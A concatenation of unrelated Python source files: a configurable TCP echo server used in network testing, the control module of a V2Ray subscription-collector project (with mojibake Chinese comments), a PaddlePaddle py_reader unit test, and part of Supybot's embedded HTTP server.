self.is_running = True
start_time = time.time()
total_echoed = 0
# set up listening socket
try:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind((self.HOST, self.port))
self.sock.listen()
self.sock.setblocking(False)
self.logger.log('%s Listening on host:%s, port:%s' % (self.prefix, self.HOST, self.port))
except Exception:
self.error = ('%s Opening listen socket %s:%s exception: %s' %
(self.prefix, self.HOST, self.port, traceback.format_exc()))
self.logger.log(self.error)
return 1
# set up selector
sel = selectors.DefaultSelector()
sel.register(self.sock, selectors.EVENT_READ, data=None)
# event loop
while True:
if not self.keep_running:
self.exit_status = "INFO: command shutdown:"
break
if self.timeout > 0.0:
elapsed = time.time() - start_time
if elapsed > self.timeout:
self.exit_status = "Exiting due to timeout. Total echoed = %d" % total_echoed
break
if self.echo_count > 0:
if total_echoed >= self.echo_count:
self.exit_status = "Exiting due to echo byte count. Total echoed = %d" % total_echoed
break
events = sel.select(timeout=0.1)
if events:
for key, mask in events:
if key.data is None:
if key.fileobj is self.sock:
self.do_accept(key.fileobj, sel, self.logger, self.conn_stall, self.close_on_conn)
else:
pass # Only listener 'sock' has None in opaque data field
else:
n_echoed = self.do_service(key, mask, sel, self.logger, self.close_on_data)
total_echoed += n_echoed if n_echoed > 0 else 0
else:
pass # select timeout. probably.
sel.unregister(self.sock)
self.sock.close()
except Exception:
self.error = "ERROR: exception : '%s'" % traceback.format_exc()
self.is_running = False
def do_accept(self, sock, sel, logger, conn_stall, close_on_conn):
conn, addr = sock.accept()
logger.log('%s Accepted connection from %s:%d' % (self.prefix, addr[0], addr[1]))
if conn_stall > 0.0:
logger.log('%s Connection from %s:%d stall start' % (self.prefix, addr[0], addr[1]))
time.sleep(conn_stall)
logger.log('%s Connection from %s:%d stall end' % (self.prefix, addr[0], addr[1]))
if close_on_conn:
logger.log('%s Connection from %s:%d closing due to close_on_conn' % (self.prefix, addr[0], addr[1]))
conn.close()
return
conn.setblocking(False)
events = selectors.EVENT_READ | selectors.EVENT_WRITE
sel.register(conn, events, data=ClientRecord(addr))
def do_service(self, key, mask, sel, logger, close_on_data):
retval = 0
sock = key.fileobj
data = key.data
if mask & selectors.EVENT_READ:
try:
recv_data = sock.recv(1024)
except IOError:
logger.log('%s Connection to %s:%d IOError: %s' %
(self.prefix, data.addr[0], data.addr[1], traceback.format_exc()))
sel.unregister(sock)
sock.close()
return 0
except Exception:
self.error = ('%s Connection to %s:%d exception: %s' %
(self.prefix, data.addr[0], data.addr[1], traceback.format_exc()))
logger.log(self.error)
sel.unregister(sock)
sock.close()
return 1
if recv_data:
data.outb += recv_data
if close_on_data:
logger.log('%s Connection to %s:%d closed due to close_on_data' % (self.prefix, data.addr[0], data.addr[1]))
sel.unregister(sock)
sock.close()
return 0
logger.log('%s read from: %s:%d len:%d: %s' % (self.prefix, data.addr[0], data.addr[1], len(recv_data),
split_chunk_for_display(recv_data)))
sel.modify(sock, selectors.EVENT_READ | selectors.EVENT_WRITE, data=data)
else:
logger.log('%s Closing connection to %s:%d' % (self.prefix, data.addr[0], data.addr[1]))
sel.unregister(sock)
sock.close()
return 0
if mask & selectors.EVENT_WRITE:
if data.outb:
try:
sent = sock.send(data.outb)
except IOError:
logger.log('%s Connection to %s:%d IOError: %s' %
(self.prefix, data.addr[0], data.addr[1], traceback.format_exc()))
sel.unregister(sock)
sock.close()
return 0
except Exception:
self.error = ('%s Connection to %s:%d exception: %s' %
(self.prefix, data.addr[0], data.addr[1], traceback.format_exc()))
logger.log(self.error)
sel.unregister(sock)
sock.close()
return 1
retval += sent
if sent > 0:
logger.log('%s write to : %s:%d len:%d: %s' % (self.prefix, data.addr[0], data.addr[1], sent,
split_chunk_for_display(data.outb[:sent])))
else:
logger.log('%s write to : %s:%d len:0' % (self.prefix, data.addr[0], data.addr[1]))
data.outb = data.outb[sent:]
else:
sel.modify(sock, selectors.EVENT_READ, data=data)
return retval
def wait(self, timeout=TIMEOUT):
self.logger.log("%s Server is shutting down" % self.prefix)
self.keep_running = False
self._thread.join(timeout)
def main(argv):
retval = 0
logger = None
# parse args
p = argparse.ArgumentParser()
p.add_argument('--port', '-p',
help='Required listening port number')
p.add_argument('--name',
help='Optional logger prefix')
p.add_argument('--echo', '-e', type=int, default=0, const=1, nargs="?",
help='Exit after echoing this many bytes. Default value "0" disables exiting on byte count.')
p.add_argument('--timeout', '-t', type=float, default=0.0, const=1, nargs="?",
help='Timeout in seconds. Default value "0.0" disables timeouts')
p.add_argument('--log', '-l',
action='store_true',
help='Write activity log to console')
# Add controlled server misbehavior for testing conditions seen in the field
# Stall required to trigger Q2 testing for DISPATCH-1947 and improving test DISPATCH-1981
p.add_argument('--connect-stall', type=float, default=0.0, const=1, nargs="?",
help='Accept connections but wait this many seconds before reading from socket. Default value "0.0" disables stall')
# Close on connect - exercises control paths scrutinized under DISPATCH-1968
p.add_argument('--close-on-connect',
action='store_true',
help='Close client connection without reading from socket when listener connects. If stall is specified then stall before closing.')
# Close on data - exercises control paths scrutinized under DISPATCH-1968
p.add_argument('--close-on-data',
action='store_true',
help='Close client connection as soon as data arrives.')
del argv[0]
args = p.parse_args(argv)
# port
if args.port is None:
raise Exception("User must specify a port number")
port = args.port
# name / prefix
prefix = args.name if args.name is not None else "ECHO_SERVER (%s)" % (str(port))
# echo
if args.echo < 0:
raise Exception("Echo count must be greater than zero")
# timeout
if args.timeout < 0.0:
raise Exception("Timeout must be greater than or equal to zero")
# timeout
if args.connect_stall < 0.0:
raise Exception("Connect-stall must be greater than or equal to zero")
signaller = GracefulExitSignaler()
server = None
try:
# logging
logger = Logger(title="%s port %s" % (prefix, port),
print_to_console=args.log,
save_for_dump=False)
server = TcpEchoServer(prefix, port, args.echo, args.timeout, logger,
args.connect_stall, args.close_on_connect, args.close_on_data)
keep_running = True
while keep_running:
time.sleep(0.1)
if server.error is not None:
logger.log("%s Server stopped with error: %s" % (prefix, server.error))
keep_running = False
retval = 1
if server.exit_status is not None:
logger.log("%s Server stopped with status: %s" % (prefix, server.exit_status))
keep_running = False
if signaller.kill_now:
logger.log("%s Process killed with signal" % prefix)
keep_running = False
if keep_running and not server.is_running:
logger.log("%s Server stopped with no error or status" % prefix)
keep_running = False
except Exception:
if logger is not None:
logger.log("%s Exception: %s" % (prefix, traceback.format_exc()))
retval = 1
if server is not None and server.sock is not None:
server.sock.close()
return retval
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
control.py
|
__all__ = ['Interface']
# FIXME๏ผๅฆๆๆจๆฏ้กน็ฎๅผๅ่
๏ผ่ฏทๅจ้กน็ฎ่ฐ่ฏไธญๆณจ้ๆไปฅไธ็monkeyๆไปถ
exec("from gevent import monkey\nmonkey.patch_all()")
import csv
import multiprocessing
import os
from BusinessCentralLayer.coroutine_engine import vsu, PuppetCore
from BusinessCentralLayer.middleware.subscribe_io import FlexibleDistribute
from BusinessCentralLayer.middleware.work_io import Middleware
from BusinessCentralLayer.sentinel.noticer import send_email
from BusinessLogicLayer.cluster.__task__ import loads_task
from BusinessLogicLayer.cluster.slavers import actions
from BusinessLogicLayer.deploy import GeventSchedule
from BusinessViewLayer.myapp.app import app
from config import *
class ConfigQuarantine(object):
def __init__(self):
self.root = [
SERVER_DIR_CLIENT_DEPORT, SERVER_PATH_DEPOT_VCS,
SERVER_DIR_DATABASE_CACHE, SERVER_DIR_CACHE_BGPIC
]
self.flag = False
def set_up_file_tree(self, root):
"""
--/qinse/V2RaycSpider{verNum}
--BCL
--BLL
--BVL
--Database
--client_depot
--vcs.csv
--logs
--*error.log
--*runtime.log
--temp_cache
--*AnyTempCacheFile...
--*CrawlFetchHistory.txt
--fake_useragent_0.1.11.json
--*tests
"""
# ๆฃๆฅ้ป่ฎคไธ่ฝฝๅฐๅๆฏๅฆๆฎ็ผบ ๆทฑๅบฆไผๅ
ๅๅงๅ็ณป็ปๆไปถ
for child_ in root:
if not os.path.exists(child_):
self.flag = True
# logger.error(f"็ณป็ปๆไปถ็ผบๅคฑ {child_}")
try:
# logger.debug(f"ๅฐ่ฏ้พๆฅ็ณป็ปๆไปถ {child_}")
# ๅๅงๅๆไปถๅคน
if os.path.isdir(child_) or not os.path.splitext(child_)[-1]:
os.mkdir(child_)
logger.success(f"็ณป็ปๆไปถ้พๆฅๆๅ->{child_}")
# ๅๅงๅๆไปถ
else:
if child_ == SERVER_PATH_DEPOT_VCS:
try:
with open(child_, 'w', encoding='utf-8', newline='') as f:
csv.writer(f).writerow(['version', 'title'])
logger.success(f"็ณป็ปๆไปถ้พๆฅๆๅ->{child_}")
except Exception as e:
logger.exception(f"Exception{child_}{e}")
except Exception as e:
logger.exception(e)
@staticmethod
def check_config():
if not all(SMTP_ACCOUNT.values()):
logger.warning('ๆจๆชๆญฃ็กฎ้
็ฝฎ<้ไฟก้ฎ็ฎฑ>ไฟกๆฏ(SMTP_ACCOUNT)')
if not SERVER_CHAN_SCKEY:
logger.warning("ๆจๆชๆญฃ็กฎ้
็ฝฎ<Server้
ฑ>็SCKEY")
if not all([REDIS_SLAVER_DDT.get("host"), REDIS_SLAVER_DDT.get("password")]):
logger.warning('ๆจๆชๆญฃ็กฎ้
็ฝฎ<Redis-Slaver> ๆฌ้กน็ฎ็้จๅๅ่ฝๅฐๆฏซๆ ๆไน')
if not all([REDIS_MASTER.get("host"), REDIS_MASTER.get("password")]):
logger.error("ๆจๆชๆญฃ็กฎ้
็ฝฎ<Redis-Master> ๆญค้
็ฝฎไธบโไบๅฝฉๅงฌโ็ๆ ธๅฟ็ปไปถ๏ผ่ฏท้
็ฝฎๅ้ๅฏ้กน็ฎ๏ผ")
exit()
def run(self):
try:
if [cq for cq in reversed(self.root) if not os.path.exists(cq)]:
logger.warning('็ณป็ปๆไปถๆฎ็ผบ๏ผ')
logger.debug("ๅฏๅจ<ๅทฅ็จ้ๆ>ๆจกๅ...")
self.set_up_file_tree(self.root)
self.check_config()
finally:
if self.flag:
logger.success(">>> ่ฟ่ก็ฏๅข้พๆฅๅฎๆ๏ผ่ฏท้ๅฏ้กน็ฎ")
logger.warning(">>> ๆ้ๆจๆญฃ็กฎ้
็ฝฎChromeๅๅฏนๅบ็ๆฌ็ChromeDriver")
exec("if self.flag:\n\texit()")
ConfigQuarantine().run()
class SystemEngine(object):
def __init__(self, **kwargs) -> None:
logger.info(f'<็ณป็ปๅๅงๅ>:SystemEngine -> {platform}')
# ่ฏปๅ้
็ฝฎๅบๅ
self.check_seq = CRAWLER_SEQUENCE
logger.info(f'<ๅฎไฝ้
็ฝฎ>:check_sequence:{self.check_seq}')
# ้ป่ฎคlinuxไธ่ชๅจ้จ็ฝฒ
self.enable_deploy = ENABLE_DEPLOY if kwargs.get(
'enable_deploy') is None else kwargs.get('enable_deploy')
logger.info('<้จ็ฝฒ่ฎพ็ฝฎ>:enable_deploy:{}'.format(self.enable_deploy))
# ๅๆบๅ็จๅ ้้
็ฝฎ
self.speed_up = ENABLE_COROUTINE if kwargs.get(
'speed_up') is None else kwargs.get('speed_up')
logger.info("<ๅ็จๅ ้>:speed_up:{}".format(self.speed_up))
# ๅๅงๅ่ฟ็จ
self.server_process, self.deploy_process = None, None
logger.info('<ๅๅงๅ่ฟ็จ>:deploy_process:server_process')
logger.info(f'<ๅ ่ฝฝ้ๅ>:IndexQueue:{actions.__all__}')
logger.success('<Gevent>ๅทฅ็จๆ ธๅฟๅๅคๅฐฑ็ปช ไปปๅกๅณๅฐๅผๅง')
@staticmethod
def run_server() -> None:
"""
้จ็ฝฒๆฅๅฃ
@return:
"""
app.run(host=OPEN_HOST, port=API_PORT, debug=API_DEBUG, threaded=API_THREADED)
def run_deploy(self) -> None:
"""
ๅฎๆถ้้
@return:
"""
GeventSchedule(go=self.speed_up).run()
def run_check(self, at_once=True) -> None:
"""
ๆฌๅฐ่ฟ่ก--ๆฃๆฅ้ๅๆฎ็ผบ
# ๆๆ็ฑปๅไปปๅก็่็น่กไธบ็ๅๆถๅ่ตท or ๆๆ็ฑปๅไปปๅก็่็น่กไธบๆๅบๆง่ก,nodeไปปๅกไน้ดไบไธๅฝฑๅ
--v2rayChain
--vNode_1
--vNode_2
--....
--ssrChain
--sNode_1
--sNode_2
--...
--..
-----> runtime v2rayChain
IF USE vsu -> runtime allTask =====> runtime ...
-----> runtime ssrChain
ELSE -> runtime allTask -> Chain_1 -> Chain_2 -> ...
-----> runtime node_1
IF USE go -> runtime allNode =====> runtime ...
-----> runtime node_N
ELSE -> runtime allNode-> the_node_1 -> the_node_2 -> ...
@return:
"""
# ๅ ่ฝฝไปปๅก้ๅ(ๅนฟๅบฆไผๅ
)
for task in self.check_seq:
loads_task(task, startup=False, at_once=at_once)
# ไปปๅกๅฏๅจ ๅนถๅๆง่ก
vsu(core=PuppetCore(), docker=Middleware.poseidon).run(self.speed_up)
# print('Easter eggs')
# fixme ๆฐๆฎๅญๅจ ่ๆๅๆญฅ
if not at_once:
FlexibleDistribute().start()
# ไปปๅก็ปๆ
logger.success('<Gevent>ไปปๅก็ปๆ')
# ๆง่กไธๆฌกๆฐๆฎ่ฟ็งป
GeventSchedule().ddt()
def run(self) -> None:
try:
if self.enable_deploy:
self.deploy_process = multiprocessing.Process(
target=self.run_deploy, name='ๅฎๆถ้้')
logger.info(f'starting {self.deploy_process.name}')
self.deploy_process.start()
if ENABLE_SERVER:
self.server_process = multiprocessing.Process(
target=self.run_server, name='็จๅบๆฅๅฃ')
logger.info(f'starting {self.server_process.name}')
self.server_process.start()
self.deploy_process.join()
self.server_process.join()
except TypeError or AttributeError as e:
logger.exception(e)
send_email("[็จๅบๅผๅธธ็ปๆญข]{}".format(str(e)), to_='self')
except KeyboardInterrupt:
logger.debug('received keyboard interrupt signal')
self.server_process.terminate()
self.deploy_process.terminate()
finally:
self.deploy_process.join()
self.server_process.join()
logger.info(
f'{self.deploy_process.name} is {"alive" if self.deploy_process.is_alive() else "dead"}')
logger.info(
f'{self.server_process.name} is {"alive" if self.server_process.is_alive() else "dead"}')
logger.success('<Gevent>ไปปๅก็ปๆ')
class Interface(object):
@staticmethod
def __window__() -> None:
"""
่ฏฅๆฅๅฃ็จไบๅผๅฏpanelๆก้ขๅ็ซฏ
@return:
"""
from BusinessViewLayer.panel.panel import V2RaycSpiderMasterPanel
v2raycs = V2RaycSpiderMasterPanel()
try:
v2raycs.home_menu()
except Exception as e:
v2raycs.debug(e)
finally:
v2raycs.kill()
@staticmethod
def run(sys_command=None, deploy_: bool = None, coroutine_speed_up: bool = False, at_once=True) -> None:
"""
ไธป็จๅบๅ
ฅๅฃ
@param at_once:
@param sys_command: sys.argv
@param deploy_:
1. โcheckโ:ๅๆบ่ฟ่ก<wins or mac ้ป่ฎค> โdeployโ:ๆๅกๅจ้จ็ฝฒ<linuxไธ้ป่ฎค>
2. ่ฅๅจๆๅกๅจไธ่ฟ่ก่ฏทไฝฟ็จโdeployโๆจกๅผ--้จ็ฝฒๅฎๆถไปปๅก
@param coroutine_speed_up:ๅ็จๅ ้ๆงไปถ๏ผๅจไปปไฝๆ
ๅตไธ้ป่ฎคๅฏๅจ
@return:
"""
# ไผๅ
่ฏปๅๅฝไปค่กๆไปค
if sys_command:
deploy_ = True if 'deploy' in sys_command else False
coroutine_speed_up = True if 'speed_up' in sys_command else False
if deploy_ is None:
deploy_ = True if 'linux' in platform else False
if deploy_:
SystemEngine(speed_up=coroutine_speed_up,
enable_deploy=deploy_).run()
else:
SystemEngine(speed_up=coroutine_speed_up,
enable_deploy=deploy_).run_check(at_once)
@staticmethod
def ddt(task_name=None):
GeventSchedule().ddt(task_name)
@staticmethod
def subs_ddt(debug=True, power=12):
from BusinessLogicLayer.plugins.ddt_subs import SubscribesCleaner
SubscribesCleaner(debug=debug).interface(power=power)
|
test_py_reader_using_executor.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import paddle.fluid as fluid
from paddle.fluid import compiler
import paddle.fluid.core as core
import numpy as np
import threading
import multiprocessing
import os
os.environ['CPU_NUM'] = str(4)
def as_tensor(np_array_or_tensor, place=None):
if isinstance(np_array_or_tensor, fluid.LoDTensor):
return np_array_or_tensor
if place is None:
place = fluid.CPUPlace()
tensor = fluid.LoDTensor()
tensor.set(np_array_or_tensor, place)
return tensor
def as_numpy(tensor_or_numpy):
return tensor_or_numpy if isinstance(
tensor_or_numpy, np.ndarray) else np.array(tensor_or_numpy)
def feed_data(feed_queue, reader):
data_generator = reader()
while True:
data = next(data_generator, None)
if data is None or not feed_queue.push(data):
break
def simple_fc_net(in_size,
class_num,
hidden_sizes,
batch_size,
queue_capacity,
use_double_buffer=False,
use_feed_list=True):
if use_feed_list:
data = fluid.layers.data(name="data", dtype='float32', shape=[in_size])
label = fluid.layers.data(name='label', dtype='int64', shape=[1])
py_reader = fluid.layers.create_py_reader_by_data(
capacity=queue_capacity,
use_double_buffer=False,
feed_list=[data, label])
else:
py_reader = fluid.layers.py_reader(
capacity=queue_capacity,
shapes=[[-1, in_size], [-1, 1]],
lod_levels=[0, 0],
dtypes=['float32', 'int64'],
use_double_buffer=False)
feed_queue = py_reader.queue
reader = fluid.layers.batch(py_reader, batch_size=batch_size)
if use_double_buffer:
reader = fluid.layers.double_buffer(reader)
in_data, label = fluid.layers.read_file(reader)
hidden = in_data
for hidden_size in hidden_sizes:
hidden = fluid.layers.fc(
hidden,
size=hidden_size,
act='tanh',
bias_attr=fluid.ParamAttr(
initializer=fluid.initializer.Constant(value=1.0)))
predict_label = fluid.layers.fc(hidden, size=class_num, act='softmax')
loss = fluid.layers.mean(
fluid.layers.cross_entropy(
input=predict_label, label=label))
optimizer = fluid.optimizer.Adam()
optimizer.minimize(loss)
return in_data, label, loss, optimizer, feed_queue, py_reader
class TestPyReaderUsingExecutor(unittest.TestCase):
def setUp(self):
self.in_size = 1000
self.hidden_sizes = [50, 30, 20]
self.class_num = 10
self.batch_size = 32
self.iterations = 10
self.queue_capacity = 50
def test(self):
for use_cuda in ([False, True]
if core.is_compiled_with_cuda() else [False]):
for use_parallel_executor in [False, True]:
for use_double_buffer in [False, True]:
for use_feed_list in [False, True]:
for use_decorate_paddle_reader in [False, True]:
print('Test Parameters:'),
print({
'use_cuda': use_cuda,
'use_parallel_executor': use_parallel_executor,
'use_double_buffer': use_double_buffer,
'use_feed_list': use_feed_list,
'use_decorate_paddle_reader':
use_decorate_paddle_reader
})
self.main(use_cuda, use_parallel_executor,
use_double_buffer, use_feed_list,
use_decorate_paddle_reader)
def tensor_reader(self, use_decorate_paddle_reader):
def reader():
self.inputs = []
cnt = 0
while True:
tensors = fluid.LoDTensorArray()
in_data = np.random.uniform(
low=0, high=1, size=(1, self.in_size)).astype('float32')
tensors.append(as_tensor(in_data))
label = np.random.random_integers(
low=0, high=self.class_num - 1, size=(1, 1)).astype('int64')
tensors.append(as_tensor(label))
if cnt < self.iterations * self.batch_size * self.batch_size_times:
if cnt % (self.batch_size * self.batch_size_times) == 0:
self.inputs.append([in_data, label])
else:
self.inputs[-1][0] = np.concatenate(
(self.inputs[-1][0], in_data), axis=0)
self.inputs[-1][1] = np.concatenate(
(self.inputs[-1][1], label), axis=0)
elif not self.use_double_buffer:
break
if use_decorate_paddle_reader:
yield [(in_data, label)]
else:
yield tensors
cnt += 1
if not use_decorate_paddle_reader:
yield None
return reader
def main(self,
use_cuda=True,
use_parallel_executor=False,
use_double_buffer=False,
use_feed_list=False,
use_decorate_paddle_reader=False):
assert not use_cuda or use_cuda and core.is_compiled_with_cuda()
self.use_cuda = use_cuda
self.use_parallel_executor = use_parallel_executor
self.use_double_buffer = use_double_buffer
self.use_feed_list = use_feed_list
self.use_decorate_paddle_reader = use_decorate_paddle_reader
startup_program = fluid.Program()
main_program = fluid.Program()
with fluid.program_guard(main_program, startup_program):
in_data, label, loss, optimizer, feed_queue, py_reader = simple_fc_net(
in_size=self.in_size,
class_num=self.class_num,
hidden_sizes=self.hidden_sizes,
batch_size=self.batch_size,
queue_capacity=self.queue_capacity,
use_double_buffer=self.use_double_buffer,
use_feed_list=self.use_feed_list)
place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(startup_program)
train_cp = compiler.CompiledProgram(main_program)
if use_parallel_executor:
train_cp = train_cp.with_data_parallel(loss_name=loss.name)
if use_cuda:
self.batch_size_times = core.get_cuda_device_count()
else:
self.batch_size_times = int(
os.environ.get('CPU_NUM', multiprocessing.cpu_count()))
else:
self.batch_size_times = 1
reader = self.tensor_reader(use_decorate_paddle_reader)
if use_decorate_paddle_reader:
py_reader.decorate_paddle_reader(reader)
py_reader.start()
else:
thread = threading.Thread(
target=feed_data, args=(feed_queue, reader))
thread.daemon = True
thread.start()
self.outputs = []
for _ in range(self.iterations):
fetches = exe.run(train_cp,
fetch_list=[in_data.name, label.name])
fetches = [as_numpy(fetch) for fetch in fetches]
self.outputs.append(fetches)
feed_queue.close()
self.validate()
if use_decorate_paddle_reader:
py_reader.exited = True
py_reader.thread.join()
else:
thread.join()
def validate(self):
self.assertEqual(len(self.inputs), len(self.outputs))
for batch_in, batch_out in zip(self.inputs, self.outputs):
self.assertEqual(len(batch_in), len(batch_out))
if self.use_parallel_executor and not self.use_double_buffer:
self.validate_unordered_batch(batch_in, batch_out)
else:
for in_data, out_data in zip(batch_in, batch_out):
self.assertEqual(in_data.shape, out_data.shape)
if not self.use_parallel_executor:
self.assertTrue((in_data == out_data).all())
def validate_unordered_batch(self, batch_in, batch_out):
out_index_left_set = set(range(self.batch_size * self.batch_size_times))
mapping_num = 0
for i in range(self.batch_size * self.batch_size_times):
for j in out_index_left_set:
flag = True
for k in range(len(batch_in)):
in_data = batch_in[k][i]
out_data = batch_out[k][j]
if (in_data != out_data).any():
flag = False
break
if flag:
out_index_left_set.remove(j)
mapping_num += 1
break
self.assertEqual(mapping_num, self.batch_size * self.batch_size_times)
if __name__ == '__main__':
unittest.main()
|
httpserver.py
|
###
# Copyright (c) 2011, Valentin Lorentz
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
"""
An embedded and centralized HTTP server for Supybot's plugins.
"""
import os
import cgi
import socket
from threading import Thread
import supybot.log as log
import supybot.conf as conf
import supybot.world as world
import supybot.utils.minisix as minisix
from supybot.i18n import PluginInternationalization
_ = PluginInternationalization()
if minisix.PY2:
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
else:
from http.server import HTTPServer, BaseHTTPRequestHandler
configGroup = conf.supybot.servers.http
class RequestNotHandled(Exception):
pass
DEFAULT_TEMPLATES = {
'index.html': """\
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<title>""" + _('Supybot Web server index') + """</title>
<link rel="stylesheet" type="text/css" href="/default.css" media="screen" />
</head>
<body class="purelisting">
<h1>Supybot web server index</h1>
<p>""" + _('Here is a list of the plugins that have a Web interface:') +\
"""
</p>
%(list)s
</body>
</html>""",
'generic/error.html': """\
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<title>%(title)s</title>
<link rel="stylesheet" href="/default.css" />
</head>
<body class="error">
<h1>Error</h1>
<p>%(error)s</p>
</body>
</html>""",
'default.css': """\
body {
background-color: #F0F0F0;
}
/************************************
* Classes that plugins should use. *
************************************/
/* Error pages */
body.error {
text-align: center;
}
body.error p {
background-color: #FFE0E0;
border: 1px #FFA0A0 solid;
}
/* Pages that only contain a list. */
.purelisting {
text-align: center;
}
.purelisting ul {
margin: 0;
padding: 0;
}
.purelisting ul li {
margin: 0;
padding: 0;
list-style-type: none;
}
/* Pages that only contain a table. */
.puretable {
text-align: center;
}
.puretable table
{
width: 100%;
border-collapse: collapse;
text-align: center;
}
.puretable table th
{
/*color: #039;*/
padding: 10px 8px;
border-bottom: 2px solid #6678b1;
}
.puretable table td
{
padding: 9px 8px 0px 8px;
border-bottom: 1px solid #ccc;
}
""",
'robots.txt': """""",
}
def set_default_templates(defaults):
for filename, content in defaults.items():
path = conf.supybot.directories.data.web.dirize(filename)
if os.path.isfile(path + '.example'):
os.unlink(path + '.example')
if not os.path.isdir(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
with open(path + '.example', 'a') as fd:
fd.write(content)
set_default_templates(DEFAULT_TEMPLATES)
def get_template(filename):
path = conf.supybot.directories.data.web.dirize(filename)
if os.path.isfile(path):
with open(path, 'r') as fd:
return fd.read()
else:
assert os.path.isfile(path + '.example'), path + '.example'
with open(path + '.example', 'r') as fd:
return fd.read()
class SupyHTTPRequestHandler(BaseHTTPRequestHandler):
def do_X(self, callbackMethod, *args, **kwargs):
if self.path == '/':
callback = SupyIndex()
elif self.path in ('/robots.txt',):
callback = Static('text/plain; charset=utf-8')
elif self.path in ('/default.css',):
callback = Static('text/css')
elif self.path == '/favicon.ico':
callback = Favicon()
else:
subdir = self.path.split('/')[1]
try:
callback = self.server.callbacks[subdir]
except KeyError:
callback = Supy404()
# Some shortcuts
for name in ('send_response', 'send_header', 'end_headers', 'rfile',
'wfile', 'headers'):
setattr(callback, name, getattr(self, name))
# We call doX, because this is more supybotic than do_X.
path = self.path
if not callback.fullpath:
path = '/' + path.split('/', 2)[-1]
getattr(callback, callbackMethod)(self, path,
*args, **kwargs)
def do_GET(self):
self.do_X('doGet')
def do_POST(self):
if 'Content-Type' not in self.headers:
self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
if self.headers['Content-Type'] == 'application/x-www-form-urlencoded':
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD':'POST',
'CONTENT_TYPE':self.headers['Content-Type'],
})
else:
content_length = int(self.headers.get('Content-Length', '0'))
form = self.rfile.read(content_length)
self.do_X('doPost', form=form)
def do_HEAD(self):
self.do_X('doHead')
def address_string(self):
s = BaseHTTPRequestHandler.address_string(self)
# Strip IPv4-mapped IPv6 addresses such as ::ffff:127.0.0.1
prefix = '::ffff:'
if s.startswith(prefix):
s = s[len(prefix):]
return s
def log_message(self, format, *args):
log.info('HTTP request: %s - %s' %
(self.address_string(), format % args))
class SupyHTTPServerCallback(log.Firewalled):
"""This is a base class that should be overriden by any plugin that want
to have a Web interface."""
__firewalled__ = {'doGet': None,
'doPost': None,
'doHead': None,
'doPut': None,
'doDelete': None,
}
fullpath = False
name = "Unnamed plugin"
defaultResponse = _("""
This is a default response of the Supybot HTTP server. If you see this
message, it probably means you are developing a plugin, and you have
neither overriden this message or defined an handler for this query.""")
if minisix.PY3:
def write(self, b):
if isinstance(b, str):
b = b.encode()
self.wfile.write(b)
else:
def write(self, s):
self.wfile.write(s)
def doGetOrHead(self, handler, path, write_content):
response = self.defaultResponse.encode()
handler.send_response(405)
self.send_header('Content-Type', 'text/plain; charset=utf-8; charset=utf-8')
self.send_header('Content-Length', len(response))
self.end_headers()
if write_content:
self.wfile.write(response)
def doGet(self, handler, path):
self.doGetOrHead(handler, path, write_content=True)
def doHead(self, handler, path):
self.doGetOrHead(handler, path, write_content=False)
doPost = doGet
def doWellKnown(self, handler, path):
"""Handles GET request to /.well-known/"""
return None
def doHook(self, handler, subdir):
"""Method called when hooking this callback."""
pass
def doUnhook(self, handler):
"""Method called when unhooking this callback."""
pass
class Supy404(SupyHTTPServerCallback):
"""A 404 Not Found error."""
name = "Error 404"
fullpath = True
response = _("""
I am a pretty clever IRC bot, but I suck at serving Web pages, particulary
if I don't know what to serve.
What I'm saying is you just triggered a 404 Not Found, and I am not
trained to help you in such a case.""")
def doGetOrHead(self, handler, path, write_content):
response = self.response
if minisix.PY3:
response = response.encode()
handler.send_response(404)
self.send_header('Content-Type', 'text/plain; charset=utf-8; charset=utf-8')
self.send_header('Content-Length', len(self.response))
self.end_headers()
if write_content:
self.wfile.write(response)
class SupyIndex(SupyHTTPServerCallback):
"""Displays the index of available plugins."""
name = "index"
defaultResponse = _("Request not handled.")
def doGetOrHead(self, handler, path, write_content):
plugins = [x for x in handler.server.callbacks.items()]
if plugins == []:
plugins = _('No plugins available.')
else:
